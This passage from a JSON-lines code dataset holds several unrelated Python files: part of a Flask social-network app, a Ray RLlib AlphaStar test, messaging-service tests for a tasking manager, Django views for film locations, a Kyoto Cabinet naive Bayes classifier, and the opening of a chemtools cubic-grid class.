db.session.commit()\r\n                return redirect(f\"/user/id{identificator}\")\r\n        return render_template(\"settings.html\", username=user.username,\r\n                               api_key=user.api_key, session=session,\r\n                               form=form,\r\n                               who=user.name + \" \" + user.surname)\r\n\r\n\r\n@app.route('/users', methods=['GET', 'POST'])\r\n@app.route(\"/user/id<int:identificator>/subscribes\",\r\n           methods=[\"GET\", \"POST\"])\r\n@login_required\r\ndef get_friends(identificator=None):\r\n    query = None\r\n    if request.method == \"POST\":\r\n        if request.args.get(\"sort\", None) not in sort_types:\r\n            session[\"sort_type\"] = sort_types[0]\r\n        else:\r\n            session[\"sort_type\"] = request.args[\"sort\"]\r\n        if request.form.get(\"query\", None) is not None:\r\n            query = request.form[\"query\"]\r\n    if identificator is None:\r\n        message = \"Users\"\r\n        who = \"\"\r\n        if query is not None:\r\n            friends = list(filter(\r\n                lambda x: query.lower() in x.name.lower()\r\n                or query.lower() in x.surname.lower()\r\n                or query.lower() in x.name.lower() + \" \" + x.surname.lower(),\r\n                User.query.all()))\r\n        else:\r\n            friends = User.query.all()\r\n    else:\r\n        user = User.query.filter_by(\r\n            id=identificator).first()\r\n        message = \"Subscriptions of\"\r\n        who = f\"{user.name} {user.surname}\".title()\r\n        fr = [User.query.filter_by(id=rel.friend_to).first() for rel in\r\n              Relations.query.filter_by(friend_from=user.id).all()]\r\n        if query is not None:\r\n            friends = list(filter(\r\n                lambda x: query.lower() in x.name.lower()\r\n                or query.lower() in x.surname.lower()\r\n                or query.lower() in x.name.lower() + \" \" + x.surname.lower(),\r\n                fr))\r\n        else:\r\n            friends = fr\r\n    return render_template(\"friends.html\", ident=identificator,\r\n                           friends=friends, message=message,\r\n                           who=who)\r\n\r\n\r\n@app.route(\"/user/id<int:identificator>/subscribers\",\r\n           methods=[\"GET\", \"POST\"])\r\n@login_required\r\ndef get_subscribers(identificator):\r\n    query = None\r\n    if request.method == \"POST\":\r\n        if request.args.get(\"sort\", None) not in sort_types:\r\n            session[\"sort_type\"] = sort_types[0]\r\n        else:\r\n            session[\"sort_type\"] = request.args[\"sort\"]\r\n        if request.form.get(\"query\", None) is not None:\r\n            query = request.form[\"query\"]\r\n    user = User.query.filter_by(\r\n        id=identificator).first()\r\n    who = f\"{user.name} {user.surname}\".title()\r\n    fr = [User.query.filter_by(id=rel.friend_from).first() for rel in\r\n          Relations.query.filter_by(friend_to=user.id).all()]\r\n    if query is not None:\r\n        friends = list(filter(\r\n            lambda x: query.lower() in x.name.lower()\r\n            or query.lower() in x.surname.lower()\r\n            or query.lower() in x.name.lower() + \" \" + x.surname.lower(),\r\n            fr))\r\n    else:\r\n        friends = fr\r\n    return render_template(\"friends.html\", ident=identificator,\r\n                           friends=friends, message=\"Subscribers of\",\r\n                           who=who)\r\n\r\n\r\n@app.route(\"/user/id<int:identificator>\", methods=['GET', 'POST'])\r\n@login_required\r\ndef user_page(identificator):\r\n    user = User.query.filter_by(\r\n        id=identificator).first()\r\n    if user is None:\r\n        return redirect(\"/404\")\r\n    self = User.query.filter_by(\r\n        id=session.get('id')).first()\r\n    is_friend = bool(Relations.query.filter_by(friend_from=self.id,\r\n                                               friend_to=user.id).all())\r\n    qty = len(Relations.query.filter_by(friend_from=user.id).all())\r\n    qty_sb = len(Relations.query.filter_by(friend_to=user.id).all())\r\n    form = ArticleForm()\r\n    if form.validate_on_submit():\r\n        if session.get(\"id\") != identificator:\r\n            return redirect(\"/404\")\r\n        art = Article(user_id=identificator, 
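The same three-clause lambda recurs in every people search above; a small helper (hypothetical, not part of the app) would express the predicate once:

def matches_query(user, query):
    # Case-insensitive match against first name, surname, or the two joined.
    q = query.lower()
    return (q in user.name.lower()
            or q in user.surname.lower()
            or q in (user.name + " " + user.surname).lower())

# e.g. friends = [u for u in User.query.all() if matches_query(u, query)]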
title=request.form.get(\"title\"),\r\n                      content=request.form.get(\"content\"),\r\n                      is_with_files=bool(request.files))\r\n        if 'file' in request.files:\r\n            nfile = FileInArticle(name=request.files['file'].filename,\r\n                                  file=request.files['file'].stream.read())\r\n            art.files.append(nfile)\r\n            db.session.add(nfile)\r\n        db.session.add(art)\r\n        db.session.commit()\r\n    articles = reversed(Article.query.filter_by(user_id=identificator).all())\r\n    return render_template(\"user_page.html\",\r\n                           date=\".\".join(reversed(str(user.date).split(\"-\"))),\r\n                           user=user, is_friends=is_friend,\r\n                           qty=qty,\r\n                           qty_sb=qty_sb,\r\n                           form=form, articles=articles)\r\n\r\n\r\n@app.route(\"/addfriend/id<int:ident>\",\r\n           methods=[\"GET\", \"POST\"])\r\n@login_required\r\ndef add_friend(ident):\r\n    if request.method == \"POST\":\r\n        do_magic(ident, \"ad\")\r\n    return redirect(f\"/user/id{ident}\")\r\n\r\n\r\n@app.route(\"/rmfriend/id<int:ident>\", methods=[\"GET\", \"POST\"])\r\n@login_required\r\ndef remove_friend(ident):\r\n    if request.method == \"POST\":\r\n        do_magic(ident, \"rm\")\r\n    return redirect(f\"/user/id{ident}\")\r\n\r\n\r\n@app.route(\"/delete_article/<int:ident>\")\r\n@login_required\r\ndef delete_article(ident):\r\n    art = Article.query.filter_by(id=ident)\r\n    article = art.first()\r\n    if article is None:\r\n        return redirect(\"/404\")\r\n    idnt = article.user_id\r\n    if idnt == session.get(\"id\") or session.get(\"is_admin\"):\r\n        if article.is_with_files:\r\n            FileInArticle.query.filter_by(id=article.files[0].id).delete()\r\n        art.delete()\r\n        db.session.commit()\r\n    return redirect(f\"/user/id{idnt}\")\r\n\r\n\r\n@app.route(\"/get_file/<int:ident>\")\r\n@login_required\r\ndef get_file(ident):\r\n    file = FileInArticle.query.filter_by(id=ident).first()\r\n    if file:\r\n        return send_file(BytesIO(file.file), attachment_filename=file.name,\r\n                         as_attachment=True)\r\n    else:\r\n        return redirect(\"/404\")\r\n\r\n\r\n@app.errorhandler(404)\r\ndef error_404(e):\r\n    return render_template(\"404.html\"), 404\r\n\r\n\r\n@app.errorhandler(500)\r\ndef server_error(e):\r\n    return render_template(\"500.html\"), 500\r\n\r\n\r\n@app.route(\"/error\")\r\ndef err():\r\n    return error_404(\"a\")\r\n\r\n\r\n@app.route(\"/logout\")\r\ndef logout():\r\n    if session.get(\"username\", None) is not None:\r\n        session.clear()\r\n    return redirect(\"/login\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    db.create_all()\r\n    app.run(host=\"0.0.0.0\", port=80)\r\n","repo_name":"HehexOne/PuralSocialNet","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":21958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24852873620","text":"import pprint\nimport pyspiel\nimport unittest\n\nimport ray\nimport ray.rllib.agents.alpha_star as alpha_star\nfrom ray.rllib.env.wrappers.open_spiel import OpenSpielEnv\nfrom ray.rllib.utils.test_utils import (\n    check_compute_single_action,\n    check_train_results,\n    framework_iterator,\n)\nfrom ray.tune import register_env\n\n# Connect-4 OpenSpiel env.\nregister_env(\"connect_four\", lambda _: OpenSpielEnv(pyspiel.load_game(\"connect_four\")))\n\n\nclass TestAlphaStar(unittest.TestCase):\n    @classmethod\n    def setUpClass(cls):\n        ray.init(num_cpus=20)\n\n    @classmethod\n    def tearDownClass(cls):\n        ray.shutdown()\n\n    def test_alpha_star_compilation(self):\n        \"\"\"Test whether an AlphaStarTrainer can be built with all frameworks.\"\"\"\n\n        config = {\n            \"env\": \"connect_four\",\n            \"gamma\": 1.0,\n            \"num_workers\": 4,\n            \"num_envs_per_worker\": 5,\n            \"model\": {\n                \"fcnet_hiddens\": [256, 256, 256],\n            },\n            \"vf_loss_coeff\": 0.01,\n            
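The route decorators rely on Flask's URL converters: a segment such as <int:identificator> (restored above where the angle-bracket converters had been stripped during extraction) is parsed from the path and handed to the view as a keyword argument. A minimal self-contained sketch of the pattern, independent of this app:

from flask import Flask

demo = Flask(__name__)

@demo.route("/user/id<int:identificator>")
def demo_user_page(identificator):
    # A request to /user/id7 reaches here with identificator == 7 (an int)
    return f"profile {identificator}"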
\"entropy_coeff\": 0.004,\n \"league_builder_config\": {\n \"win_rate_threshold_for_new_snapshot\": 0.8,\n \"num_random_policies\": 2,\n \"num_learning_league_exploiters\": 1,\n \"num_learning_main_exploiters\": 1,\n },\n \"grad_clip\": 10.0,\n \"replay_buffer_capacity\": 10,\n \"replay_buffer_replay_ratio\": 0.0,\n # Two GPUs -> 2 policies per GPU.\n \"num_gpus\": 4,\n \"_fake_gpus\": True,\n # Test with KL loss, just to cover that extra code.\n \"use_kl_loss\": True,\n }\n\n num_iterations = 2\n\n for _ in framework_iterator(config, with_eager_tracing=True):\n _config = config.copy()\n trainer = alpha_star.AlphaStarTrainer(config=_config)\n for i in range(num_iterations):\n results = trainer.train()\n check_train_results(results)\n pprint.pprint(results)\n check_compute_single_action(trainer)\n trainer.stop()\n\n\nif __name__ == \"__main__\":\n import pytest\n import sys\n\n sys.exit(pytest.main([\"-v\", __file__]))\n","repo_name":"santosh-shetkar-katonic/ray-cluster","sub_path":"rllib/agents/alpha_star/tests/test_alpha_star.py","file_name":"test_alpha_star.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38880241875","text":"from unittest.mock import patch\n\nfrom backend.models.dtos.message_dto import MessageDTO\nfrom backend.services.messaging.message_service import MessageService\nfrom backend.models.postgis.statuses import TaskStatus\nfrom backend.models.postgis.message import MessageType\nfrom backend.models.postgis.task import Task\nfrom backend.services.messaging.smtp_service import SMTPService\nfrom tests.backend.helpers.test_helpers import (\n add_manager_to_organisation,\n create_canned_organisation,\n return_canned_user,\n create_canned_project,\n update_project_with_info,\n)\nfrom tests.backend.base import BaseTestCase\n\n\nclass TestMessageService(BaseTestCase):\n def test_welcome_message_sent(self):\n self.test_user = return_canned_user()\n self.test_user.create()\n # Act\n message_id = MessageService.send_welcome_message(self.test_user)\n self.assertIsNotNone(message_id)\n message = MessageService.get_message(message_id, self.test_user.id)\n\n # Assert\n self.assertTrue(message, \"Message should be saved to DB\")\n\n # Tidyup\n MessageService.delete_message(message_id, self.test_user.id)\n\n def test_validation_message_is_not_sent_for_validating_self_mapped_task(self):\n # Arrange\n status = TaskStatus.VALIDATED.value\n validated_by = 777 # random user id\n mapped_by = 777 # random user id\n project_id = 1 # random project id\n task_id = 1 # random task id\n # Act/Assert\n self.assertFalse(\n MessageService.send_message_after_validation(\n status, validated_by, mapped_by, project_id, task_id\n )\n )\n\n @patch.object(MessageService, \"_push_messages\")\n def test_validation_message_is_sent_after_task_validation(self, mock_push_message):\n # Arrange\n status = TaskStatus.VALIDATED.value\n canned_project, canned_author = create_canned_project()\n update_project_with_info(canned_project)\n canned_user = return_canned_user()\n canned_user.id, canned_user.username = 100000, \"test_user\"\n canned_user.create()\n # Act\n MessageService.send_message_after_validation(\n status, canned_author.id, canned_user.id, 1, canned_project.id\n )\n\n # Assert\n mock_push_message.assert_called()\n\n @patch.object(MessageService, \"_push_messages\")\n def test_send_message_to_all_contributors(self, mock_push_message):\n # Arrange\n canned_project, canned_author = 
create_canned_project()\n        canned_project = update_project_with_info(canned_project)\n        canned_user = return_canned_user()\n        canned_user.id, canned_user.username = 100000, \"test_user\"\n        canned_user.create()\n        task = Task.get(1, canned_project.id)\n        task.mapped_by = canned_user.id\n        message_dto = MessageDTO()\n        message_dto.message_id = 12\n        message_dto.subject = \"Test subject\"\n        message_dto.message = \"Test message\"\n        message_dto.from_user_id = canned_author.id\n        message_dto.from_username = canned_author.username\n        message_dto.project_id = canned_project.id\n        message_dto.project_title = \"Test project\"\n        message_dto.message_type = MessageType.PROJECT_ACTIVITY_NOTIFICATION.value\n        message_dto.sent_date = \"2020-01-01\"\n        # Act\n        MessageService.send_message_to_all_contributors(canned_project.id, message_dto)\n        # Assert\n        mock_push_message.assert_called()\n\n    @patch.object(MessageService, \"_push_messages\")\n    def test_send_message_after_comment(self, mock_push_message):\n        # Arrange\n        canned_project, canned_author = create_canned_project()\n        canned_project = update_project_with_info(canned_project)\n        canned_user = return_canned_user()\n        canned_user.id, canned_user.username = 100000, \"test_user\"\n        canned_user.create()\n        # Act\n        MessageService.send_message_after_comment(\n            canned_author.id, \"@test_user Test message\", 1, canned_project.id\n        )\n        # Assert\n        mock_push_message.assert_called()\n\n    @patch.object(SMTPService, \"_send_message\")\n    def test_send_project_transfer_message(self, mock_send_message):\n        test_project, test_author = create_canned_project()\n        test_user = return_canned_user(\"test_user\", 11111)\n        test_user.email_address = \"test@hotmalinator.com\"\n        test_user.is_email_verified = True\n        test_user.create()\n        test_organisation = create_canned_organisation()\n        test_project.organisation = test_organisation\n        add_manager_to_organisation(test_organisation, test_user)\n        MessageService.send_project_transfer_message(\n            test_project.id, test_user.username, test_author.username\n        )\n        mock_send_message.assert_called()\n","repo_name":"osmus/tasking-manager","sub_path":"tests/backend/integration/services/messaging/test_messaging_service.py","file_name":"test_messaging_service.py","file_ext":"py","file_size_in_byte":4832,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"32147551102","text":"# -*- coding: utf-8 -*-\r\n\r\n# Imports\r\nfrom __future__ import unicode_literals\r\n\r\nimport json\r\nimport logging\r\n\r\nfrom django.template import loader\r\nfrom django.shortcuts import render, redirect, get_object_or_404\r\nfrom django.http import JsonResponse\r\nfrom django.contrib.auth.decorators import login_required\r\nfrom django.views.decorators.http import require_POST\r\nfrom django.urls import reverse\r\nfrom django.db.models import Count\r\n\r\nfrom common.views import error, not_found\r\nfrom .models import Location, NO_COUNTIES, LOCATION_TYPES\r\nfrom .forms import LocationForm\r\n\r\n\r\n# Logger\r\nlogger = logging.getLogger('norloc')\r\n\r\n\r\n# View/JSON: Locations\r\ndef locations(request, county=None, place=None, json=False):\r\n    # Filter\r\n    locations = Location.objects\r\n\r\n    if county:\r\n        locations = locations.filter(county=county)\r\n\r\n    if place:\r\n        locations = locations.filter(place_slug=place)\r\n\r\n    locations = locations.all().annotate(production_count=Count('scene__production', distinct=True))\r\n\r\n    # elif filter in ['film', 'tv']:\r\n    #     # Filter by type\r\n    #     productions = Production.objects.filter(type={\r\n    #         'film': 'film',\r\n    #         'tv': 'show',\r\n    # 
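These tests lean on unittest.mock.patch.object, which swaps a class attribute for a MagicMock for the duration of the decorated test and injects the mock as an extra argument. A self-contained illustration (the Mailer/notify names are invented for this sketch):

import unittest
from unittest.mock import patch

class Mailer:
    def send(self, to, body):
        raise RuntimeError("would hit the network")

def notify(mailer, user):
    mailer.send(user, "hello")

class NotifyTest(unittest.TestCase):
    @patch.object(Mailer, "send")
    def test_notify_sends_mail(self, mock_send):
        # Mailer.send is a MagicMock here, so no network call happens.
        notify(Mailer(), "alice")
        mock_send.assert_called_once_with("alice", "hello")

if __name__ == "__main__":
    unittest.main()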
}.get(filter)).order_by('-release')\r\n\r\n    # else:\r\n    #     # Invalid filter\r\n    #     return not_found(request)\r\n\r\n\r\n    # Locations in JSON format\r\n    if json:\r\n        # Return JSON (bounds are included only when ?bounds=true is passed)\r\n        include_bounds = request.GET.get('bounds', '').lower() == 'true'\r\n\r\n        return JsonResponse({'locations': [{\r\n            'pk': location.pk,\r\n            'full_address': location.full_address,\r\n            'bounds': location.bounds if include_bounds and location.bounds else []\r\n        } for location in locations]})\r\n\r\n    # Render template\r\n    return render(request, 'locations.html', {\r\n        # 'filter': filter,\r\n        'counties': NO_COUNTIES,\r\n        'location_types': LOCATION_TYPES,\r\n        'locations': locations\r\n    })\r\n\r\n\r\n# View: Location\r\ndef location(request, county, place, slug):\r\n    # Location\r\n    location = get_object_or_404(Location, county=county, place_slug=place, slug=slug)\r\n    edit_request = bool(request.GET.get('edit', False))\r\n    edit_mode = edit_request and request.user.is_authenticated\r\n    form = None\r\n\r\n    # Edit location (GET)\r\n    if request.method == 'GET' and edit_mode:\r\n        # Form\r\n        form = LocationForm(instance=location)\r\n\r\n    # Update location (POST)\r\n    if request.method == 'POST' and edit_mode:\r\n        form = LocationForm(instance=location, data=request.POST)  # , files=request.FILES\r\n\r\n        logger.info('Checking if form is valid')\r\n\r\n        if form.is_valid():\r\n            # Save\r\n            logger.info('Form valid, saving posted data')\r\n            form.save()\r\n\r\n            # Redirect\r\n            return redirect(reverse('location', args=[form.instance.county, form.instance.place_slug, form.instance.slug]) + '?edit=true')\r\n\r\n        else:\r\n            logger.error('Form invalid')\r\n            logger.debug(dict(form.errors.items()))\r\n\r\n    # Render template\r\n    logger.info('Rendering location (%s), slug=%s, edit_mode=%r (requested=%r, auth=%r)' % (\r\n        request.method, location.slug, edit_mode, edit_request, request.user.is_authenticated\r\n    ))\r\n\r\n    return render(request, 'location.html', {\r\n        'edit_mode': edit_mode,\r\n        'form': form if edit_mode else None,\r\n        'location': location\r\n    })\r\n\r\n\r\n# JSON: Location details\r\ndef location_details(request, lpk):\r\n    # Location\r\n    location = get_object_or_404(Location, pk=lpk)\r\n\r\n    productions = {}\r\n\r\n    for scene in location.scene_set.all().order_by('production__release'):\r\n        if scene.production.pk not in productions:\r\n            productions[scene.production.pk] = {\r\n                'pk': scene.production.pk,\r\n                'title': scene.production.title_with_year,\r\n                'poster': scene.production.poster.url if scene.production.poster else None,\r\n                'directors': [p.name for p in scene.production.directors.all()],\r\n                'url': reverse('production', args=[scene.production.type, scene.production.slug]),\r\n                'scenes': []\r\n            }\r\n\r\n        productions[scene.production.pk]['scenes'].append({\r\n            'pk': scene.pk,\r\n            'description': scene.description,\r\n            'shot_count': scene.shot_set.count(),\r\n            'uncertain': scene.uncertain,\r\n            'shots': [{\r\n                'image': s.image.url,\r\n                'timecode': s.timecode,\r\n                'double': s.double,\r\n            } for s in scene.shot_set.order_by('timecode', 'pk')]\r\n        })\r\n\r\n    # Return JSON\r\n    return JsonResponse({\r\n        'pk': location.pk,\r\n        'url': reverse('location', args=[location.county, location.place_slug, location.slug]),\r\n        'address': location.address,\r\n        'place': location.place,\r\n        'county': location.get_county_display(),\r\n        'description': location.description,\r\n        'photo': location.photo.photo.url if location.photo else None,\r\n        'productions': [p for p in productions.values()],\r\n    })\r\n\r\n\r\n# JSON: Productions (by location)\r\ndef productions(request, lpk):\r\n    # Location\r\n    location = get_object_or_404(Location, pk=lpk)\r\n\r\n    # Find all productions for the given location\r\n    productions = {}\r\n\r\n    for scene in location.scene_set.all():\r\n        if scene.production.pk not in productions:\r\n            
productions[scene.production.pk] = {\r\n                'title': scene.production.title_with_year,\r\n                'release': scene.production.release,\r\n                'directors': [p.name for p in scene.production.directors.all()],\r\n                'summary': scene.production.summary,\r\n                'summary_credit': scene.production.summary_credit,\r\n                'url': reverse('production', args=[scene.production.type, scene.production.slug]),\r\n                'uncertain': False,\r\n                'poster': scene.production.poster.url if scene.production.poster else None,\r\n                'scenes': []\r\n            }\r\n\r\n        productions[scene.production.pk]['uncertain'] = scene.uncertain\r\n\r\n        productions[scene.production.pk]['scenes'].append({\r\n            'pk': scene.pk,\r\n            'description': scene.description,\r\n            'shot_count': scene.shot_set.count(),\r\n            'uncertain': scene.uncertain,\r\n            'shots': [{\r\n                'image': s.image.url,\r\n                'timecode': s.timecode,\r\n                'double': s.double,\r\n            } for s in scene.shot_set.order_by('timecode', 'pk')]\r\n        })\r\n\r\n    # Return JSON\r\n    return JsonResponse(productions)\r\n\r\n\r\n# JSON: Update location bounds\r\n@login_required\r\n@require_POST\r\ndef update_location_bounds(request, lpk):\r\n    # Location\r\n    location = get_object_or_404(Location, pk=lpk)\r\n\r\n    # print '~'*50\r\n    # print location.bounds\r\n    # print location.bounds_locked\r\n    # print '~'*50\r\n\r\n    if not request.is_ajax():\r\n        return JsonResponse({'success': False})\r\n\r\n    try:\r\n        # Parse data\r\n        bounds = json.loads(request.body)\r\n\r\n        # Update location bounds\r\n        location.bounds = bounds\r\n        location.save()\r\n\r\n    except (ValueError, TypeError):\r\n        # Malformed payload: report failure instead of raising a server error\r\n        return JsonResponse({'success': False})\r\n\r\n    # Return JSON\r\n    return JsonResponse({'success': True})","repo_name":"petterhj/django-norloc","sub_path":"norloc/locations/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7132,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"31920668431","text":"import operator\r\nimport struct\r\nfrom functools import reduce  # reduce is no longer a builtin on Python 3\r\nimport kyotocabinet as kc\r\n\r\n\r\nclass ClassifierDB(kc.DB):\r\n    \"\"\"\r\n    Wrapper for `kyotocabinet.DB` that provides utilities for working with\r\n    features and categories.\r\n    \"\"\"\r\n    def __init__(self, *args, **kwargs):\r\n        super(ClassifierDB, self).__init__(*args, **kwargs)\r\n\r\n        self._category_tmpl = 'category.%s'\r\n        self._feature_to_category_tmpl = 'feature2category.%s.%s'\r\n        self._total_count = 'total-count'\r\n\r\n    def get_int(self, key):\r\n        # Kyoto serializes ints big-endian 8-bytes long, so we need to unpack\r\n        # them using the `struct` module.\r\n        value = self.get(key)\r\n        if value:\r\n            return struct.unpack('>Q', value)[0]\r\n        return 0\r\n\r\n    def incr_feature_category(self, feature, category):\r\n        \"\"\"Increment the count for the feature in the given category.\"\"\"\r\n        return self.increment(\r\n            self._feature_to_category_tmpl % (feature, category),\r\n            1)\r\n\r\n    def incr_category(self, category):\r\n        \"\"\"\r\n        Increment the count for the given category, increasing the total\r\n        count as well.\r\n        \"\"\"\r\n        self.increment(self._total_count, 1)\r\n        return self.increment(self._category_tmpl % category, 1)\r\n\r\n    def category_count(self, category):\r\n        \"\"\"Return the number of documents in the given category.\"\"\"\r\n        return self.get_int(self._category_tmpl % category)\r\n\r\n    def total_count(self):\r\n        \"\"\"Return the total number of documents overall.\"\"\"\r\n        return self.get_int(self._total_count)\r\n\r\n    def get_feature_category_count(self, feature, category):\r\n        \"\"\"Get the count of the feature in the given category.\"\"\"\r\n        return self.get_int(\r\n            self._feature_to_category_tmpl % (feature, category))\r\n\r\n    def get_feature_counts(self, 
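update_location_bounds is a small parse-then-persist endpoint; a standalone sketch of the same validation pattern (no Django required, parse_bounds is illustrative):

import json

def parse_bounds(body):
    # Return the decoded bounds list, or None when the payload is not valid
    # JSON or not list-shaped -- mirroring the endpoint's failure branch.
    try:
        bounds = json.loads(body)
    except (ValueError, TypeError):
        return None
    return bounds if isinstance(bounds, list) else None

print(parse_bounds(b'[[59.91, 10.75], [59.90, 10.76]]'))  # parsed list
print(parse_bounds(b'not json'))                          # None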
feature):\r\n \"\"\"Get the total count for the feature across all categories.\"\"\"\r\n prefix = self._feature_to_category_tmpl % (feature, '')\r\n total = 0\r\n for key in self.match_prefix(prefix):\r\n total += self.get_int(key)\r\n return total\r\n\r\n def iter_categories(self):\r\n \"\"\"\r\n Return an iterable that successively yields all the categories\r\n that have been observed.\r\n \"\"\"\r\n category_prefix = self._category_tmpl % ''\r\n prefix_len = len(category_prefix)\r\n for category_key in self.match_prefix(category_prefix):\r\n yield category_key[prefix_len:]\r\n\r\n\r\nclass NBC(object):\r\n \"\"\"\r\n Simple naive bayes classifier.\r\n \"\"\"\r\n def __init__(self, filename, read_only=False):\r\n \"\"\"\r\n Initialize the classifier by pointing it at a database file. If you\r\n intend to only use the classifier for classifying documents, specify\r\n `read_only=True`.\r\n \"\"\"\r\n self.filename = filename\r\n if not self.filename.endswith('.kct'):\r\n raise RuntimeError('Database filename must have \"kct\" extension.')\r\n\r\n self.db = ClassifierDB()\r\n self.connect(read_only=read_only)\r\n\r\n def connect(self, read_only=False):\r\n \"\"\"\r\n Open the database. Since Kyoto Cabinet only allows a single writer\r\n at a time, the `connect()` method accepts a parameter allowing the\r\n database to be opened in read-only mode (supporting multiple readers).\r\n If you plan on training the classifier, specify `read_only=False`.\r\n If you plan only on classifying documents, it is safe to specify\r\n `read_only=True`.\r\n \"\"\"\r\n if read_only:\r\n flags = kc.DB.OREADER\r\n else:\r\n flags = kc.DB.OWRITER\r\n self.db.open(self.filename, flags | kc.DB.OCREATE)\r\n\r\n def close(self):\r\n \"\"\"Close the database.\"\"\"\r\n self.db.close()\r\n\r\n def train(self, features, *categories):\r\n \"\"\"\r\n Increment the counts for the features in the given categories.\r\n \"\"\"\r\n for category in categories:\r\n for feature in features:\r\n self.db.incr_feature_category(feature, category)\r\n self.db.incr_category(category)\r\n\r\n def feature_probability(self, feature, category):\r\n \"\"\"\r\n Calculate the probability that a particular feature is associated\r\n with the given category.\r\n \"\"\"\r\n fcc = self.db.get_feature_category_count(feature, category)\r\n if fcc:\r\n category_count = self.db.category_count(category)\r\n return float(fcc) / category_count\r\n return 0\r\n\r\n def weighted_probability(self, feature, category, weight=1.0):\r\n \"\"\"\r\n Determine the probability a feature corresponds to the given category.\r\n The probability is weighted by the importance of the feature, which\r\n is determined by looking at the feature across all categories in\r\n which it appears.\r\n \"\"\"\r\n initial_prob = self.feature_probability(feature, category)\r\n totals = self.db.get_feature_counts(feature)\r\n return ((weight * 0.5) + (totals * initial_prob)) / (weight + totals)\r\n\r\n def document_probability(self, features, category):\r\n \"\"\"\r\n Calculate the probability that a set of features match the given\r\n category.\r\n \"\"\"\r\n feature_probabilities = [\r\n self.weighted_probability(feature, category)\r\n for feature in features]\r\n return reduce(operator.mul, feature_probabilities, 1)\r\n\r\n def weighted_document_probability(self, features, category):\r\n \"\"\"\r\n Calculate the probability that a set of features match the given\r\n category, and weight that score by the importance of the category.\r\n \"\"\"\r\n if self.db.total_count() == 0:\r\n # 
Avoid division by zero.\r\n            return 0\r\n\r\n        cat_prob = (float(self.db.category_count(category)) /\r\n                    self.db.total_count())\r\n        doc_prob = self.document_probability(features, category)\r\n        return doc_prob * cat_prob\r\n\r\n    def classify(self, features, limit=5):\r\n        \"\"\"\r\n        Classify the features by finding the categories that match the\r\n        features with the highest probability.\r\n        \"\"\"\r\n        probabilities = {}\r\n        for category in self.db.iter_categories():\r\n            probabilities[category] = self.weighted_document_probability(\r\n                features,\r\n                category)\r\n\r\n        return sorted(\r\n            probabilities.items(),\r\n            key=operator.itemgetter(1),\r\n            reverse=True)[:limit]\r\n","repo_name":"nicoisaverage/spam_or_ham","sub_path":"nb_classifier.py","file_name":"nb_classifier.py","file_ext":"py","file_size_in_byte":6564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33190356567","text":"import logging\nimport numpy as np\n\nfrom chemtools.wrappers.molecule import Molecule\n\ntry:\n    from importlib_resources import path\nexcept ImportError:\n    from importlib.resources import path\n\n\n__all__ = ['UniformGrid']\n\n\nclass UniformGrid(object):\n    \"\"\"Class for generating a cubic grid and writing cube files.\"\"\"\n\n    def __init__(self, numbers, pseudo_numbers, coordinates, origin, axes, shape):\n        \"\"\"Initialize ``UniformGrid`` class based on the origin, axes and shape of the cube.\n\n        Parameters\n        ----------\n        numbers : np.ndarray, shape=(M,)\n            Atomic number of `M` atoms in the molecule.\n        pseudo_numbers : np.ndarray, shape=(M,)\n            Pseudo-number of `M` atoms in the molecule.\n        coordinates : np.ndarray, shape=(M, 3)\n            Cartesian coordinates of `M` atoms in the molecule.\n        origin : np.ndarray, shape=(3,)\n            Cartesian coordinates of the cubic grid origin.\n        axes : np.ndarray, shape=(3, 3)\n            The three vectors, stored as rows of axes array,\n            defining the Cartesian coordinate system used to build the\n            cubic grid.\n        shape : np.ndarray, shape=(3,)\n            Number of grid points along `x`, `y`, and `z` axis.\n        \"\"\"\n        self._numbers = numbers\n        self._pseudo_numbers = pseudo_numbers\n        self._coordinates = coordinates\n        if origin.shape[0] != 3:\n            raise ValueError('Argument origin should be an np.ndarray with shape=(3,)')\n        self._origin = origin\n        if axes.shape[0] != 3 or axes.shape[1] != 3:\n            raise ValueError('Argument axes should be an np.ndarray with shape=(3, 3)')\n        self._axes = axes\n        if shape.shape[0] != 3:\n            raise ValueError('Argument shape should be an np.ndarray with shape=(3,)')\n        self._shape = shape\n        #\n        # Make cubic grid\n        #\n        # Number of points along x, y and z axis\n        npoints_x, npoints_y, npoints_z = self._shape\n        # Total number of grid points\n        self._npoints = npoints_x * npoints_y * npoints_z\n        # Make an array to store coordinates of grid points\n        self._points = np.zeros((self._npoints, 3))\n        coords = np.array(\n            np.meshgrid(np.arange(npoints_x), np.arange(npoints_y), np.arange(npoints_z))\n        )\n        coords = np.swapaxes(coords, 1, 2)\n        coords = coords.reshape(3, -1)\n        coords = coords.T\n        self._points = coords.dot(self._axes)\n        # Compute coordinates of grid points relative to the origin\n        self._points += self._origin\n\n        # log information\n        self._log_init()\n\n    @classmethod\n    def from_molecule(cls, molecule, spacing=0.2, extension=5.0, rotate=True):\n        \"\"\"Initialize ``UniformGrid`` class from Molecule object.\n\n        Parameters\n        ----------\n        molecule: instance of `Molecule`\n            Instance of Molecule class.\n        spacing : float, optional\n            Increment between grid 
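A hedged usage sketch for the classifier above (assumes the kyotocabinet binding is installed and the working directory is writable; the 'spam'/'ham' labels are illustrative):

from nb_classifier import NBC

clf = NBC('mail.kct')                          # the .kct extension is required
clf.train(['cheap', 'pills', 'now'], 'spam')
clf.train(['meeting', 'tomorrow', 'noon'], 'ham')

# classify() returns (category, weighted probability) pairs, best match first.
print(clf.classify(['cheap', 'meeting']))
clf.close()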
